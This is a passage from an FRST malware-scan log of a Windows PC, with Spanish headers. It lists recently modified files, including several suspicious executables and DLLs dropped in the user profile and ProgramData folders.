2020-01-31 11:11 - 2019-09-13 19:13 - 000000000 ____D C:\FRST
2020-01-31 11:11 - 2011-01-22 11:38 - 000723256 _____ C:\Windows\system32\perfh00A.dat
2020-01-31 11:11 - 2011-01-22 11:38 - 000149330 _____ C:\Windows\system32\perfc00A.dat
2020-01-31 11:11 - 2009-07-14 06:13 - 001613422 _____ C:\Windows\system32\PerfStringBackup.INI
2020-01-31 11:11 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\inf
2020-01-31 11:10 - 2019-10-18 11:00 - 002581504 _____ (Farbar) C:\Users\MrEidrian\Desktop\FRST64.exe
2020-01-31 11:10 - 2012-06-25 16:19 - 000000000 ____D C:\Users\MrEidrian\AppData\Local\Adobe
2020-01-31 11:07 - 2019-09-14 08:18 - 000068424 _____ (EnigmaSoft Limited) C:\Windows\system32\Drivers\EnigmaFileMonDriver.sys
2020-01-31 11:07 - 2017-03-09 11:56 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2020-01-31 11:06 - 2009-07-14 06:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2020-01-17 12:07 - 2016-12-02 08:26 - 000000000 ____D C:\Users\MrEidrian\AppData\LocalLow\Mozilla
2020-01-17 12:03 - 2018-01-20 18:37 - 000000000 ____D C:\ProgramData\MEGAsync
2020-01-17 12:01 - 2012-06-07 12:49 - 000000000 ____D C:\Windows\SysWOW64\Macromed
2020-01-17 12:00 - 2009-07-14 05:45 - 000026224 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2020-01-17 12:00 - 2009-07-14 05:45 - 000026224 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2020-01-17 11:54 - 2014-02-03 20:35 - 000000000 ____D C:\ProgramData\Google
2020-01-17 11:51 - 2012-09-21 16:34 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2020-01-17 11:51 - 2012-06-07 13:18 - 000000000 ____D C:\Program Files\CCleaner
2020-01-17 11:48 - 2016-12-01 09:13 - 000004320 _____ C:\Windows\system32\Tasks\Adobe Flash Player Updater
2020-01-17 11:48 - 2012-06-07 12:49 - 000842296 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerApp.exe
2020-01-17 11:48 - 2012-06-07 12:49 - 000175160 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2020-01-17 11:48 - 2012-06-07 12:49 - 000000000 ____D C:\Windows\system32\Macromed
2020-01-17 11:47 - 2012-10-12 08:36 - 000000000 ____D C:\Users\MrEidrian\AppData\LocalLow\Temp
2020-01-17 11:47 - 2012-10-12 08:36 - 000000000 ____D C:\Users\MrEidrian\AppData\Local\CRE
2020-01-17 11:40 - 2015-06-10 18:11 - 000004056 _____ C:\Windows\system32\Tasks\Opera scheduled Autoupdate 1380006602
2020-01-17 11:35 - 2013-03-30 10:53 - 000003536 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
2020-01-17 11:35 - 2013-03-30 10:53 - 000003408 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
2020-01-17 11:35 - 2013-03-30 10:53 - 000000000 ____D C:\Program Files (x86)\Google
2020-01-17 11:34 - 2012-06-07 12:26 - 000000000 ____D C:\Users\MrEidrian
==================== Archivos en la raíz de algunos directorios ========
2020-01-31 11:11 - 2020-01-31 11:11 - 000334288 _____ (Mozilla Foundation) C:\ProgramData\freebl3.dll
2020-01-31 11:11 - 2020-01-31 11:11 - 000137168 _____ (Mozilla Foundation) C:\ProgramData\mozglue.dll
2020-01-31 11:11 - 2020-01-31 11:11 - 000440120 _____ (Microsoft Corporation) C:\ProgramData\msvcp140.dll
2020-01-31 11:11 - 2020-01-31 11:11 - 001246160 _____ (Mozilla Foundation) C:\ProgramData\nss3.dll
2020-01-31 11:11 - 2020-01-31 11:11 - 000144848 _____ (Mozilla Foundation) C:\ProgramData\softokn3.dll
2020-01-31 11:11 - 2020-01-31 11:11 - 000083784 _____ (Microsoft Corporation) C:\ProgramData\vcruntime140.dll
2019-09-01 09:14 - 2019-09-01 09:14 - 000265728 _____ () C:\Users\MrEidrian\3272741.exe
2019-09-01 09:14 - 2019-09-01 09:14 - 000265728 _____ () C:\Users\MrEidrian\4131620.exe
2019-09-01 09:54 - 2019-09-01 09:54 - 000265728 _____ () C:\Users\MrEidrian\4411038.exe
2019-09-01 09:54 - 2019-09-01 09:54 - 000265728 _____ () C:\Users\MrEidrian\5111029.exe
2020-01-17 11:34 - 2020-01-17 12:07 - 008021968 _____ (Password Kernel) C:\Users\MrEidrian\updata.exe
2013-10-07 07:13 - 2013-10-07 07:13 - 000000132 _____ () C:\Users\MrEidrian\AppData\Roaming\Prefs. de formato GIF de Adobe CS6
2013-10-08 09:02 - 2019-03-08 09:35 - 000000132 _____ () C:\Users\MrEidrian\AppData\Roaming\Prefs. de formato PNG de Adobe CS6
2012-09-23 17:25 - 2012-09-23 17:34 - 000000600 _____ () C:\Users\MrEidrian\AppData\Roaming\winscp.rnd
2012-11-04 21:33 - 2014-03-13 10:30 - 000001456 _____ () C:\Users\MrEidrian\AppData\Local\Adobe Guardar para Web 13.0 Prefs
2019-09-01 07:28 - 2019-09-01 07:28 - 008006656 _____ () C:\Users\MrEidrian\AppData\Local\agent.dat
2019-09-01 07:28 - 2019-09-01 07:28 - 000054272 _____ () C:\Users\MrEidrian\AppData\Local\ApplicationHosting.dat
2019-09-01 07:43 - 2019-09-01 07:43 - 000016896 _____ () C:\Users\MrEidrian\AppData\Local\clakem.dll
2019-09-01 07:28 - 2019-09-01 07:28 - 000070992 _____ () C:\Users\MrEidrian\AppData\Local\Config.xml
2013-03-30 11:06 - 2018-10-19 08:05 - 000012288 _____ () C:\Users\MrEidrian\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2017-02-18 12:05 - 2018-05-11 12:26 - 000534528 _____ (Dirección General de la Policía) C:\Users\MrEidrian\AppData\Local\DNIeService.exe
2019-09-01 07:28 - 2019-09-01 07:28 - 000140800 _____ () C:\Users\MrEidrian\AppData\Local\installer.dat
2019-09-01 07:28 - 2019-09-01 07:27 - 001489920 _____ (NA) C:\Users\MrEidrian\AppData\Local\K-bam.exe
2019-09-01 07:28 - 2019-09-01 07:28 - 002047539 _____ () C:\Users\MrEidrian\AppData\Local\K-bam.tst
2015-08-08 08:12 - 2019-04-02 11:15 - 000004096 ____H () C:\Users\MrEidrian\AppData\Local\keyfile3.drm
2019-09-01 07:28 - 2019-09-01 07:28 - 000126464 _____ () C:\Users\MrEidrian\AppData\Local\lobby.dat
2019-09-01 07:28 - 2019-09-01 07:28 - 000005568 _____ () C:\Users\MrEidrian\AppData\Local\md.xml
2019-09-01 07:28 - 2019-09-01 07:28 - 000126464 _____ () C:\Users\MrEidrian\AppData\Local\noah.dat
2017-10-13 16:33 - 2017-10-13 16:33 - 000000001 _____ () C:\Users\MrEidrian\AppData\Local\RawCopy.1.10.agreement
2017-10-13 16:34 - 2017-10-14 15:48 - 000000001 _____ () C:\Users\MrEidrian\AppData\Local\RawCopy.sourcedisk.index
2019-09-01 07:28 - 2019-09-14 08:29 - 000722944 _____ () C:\Users\MrEidrian\AppData\Local\sha.db
2019-09-01 07:28 - 2019-09-01 07:28 - 001895383 _____ () C:\Users\MrEidrian\AppData\Local\Statlux.bin
2019-09-01 07:28 - 2019-09-01 07:27 - 001489920 _____ (NA) C:\Users\MrEidrian\AppData\Local\Toplam.exe
2019-09-01 07:28 - 2019-09-01 07:28 - 000072787 _____ () C:\Users\MrEidrian\AppData\Local\Toplam.tst
2019-09-01 07:28 - 2019-09-01 07:28 - 000032038 _____ () C:\Users\MrEidrian\AppData\Local\uninstall_temp.ico
==================== SigCheck ============================
(No existe una corrección automática para los archivos que no pasan la verificación.)
LastRegBack: 2019-09-16 16:29
==================== Final de FRST.txt ========================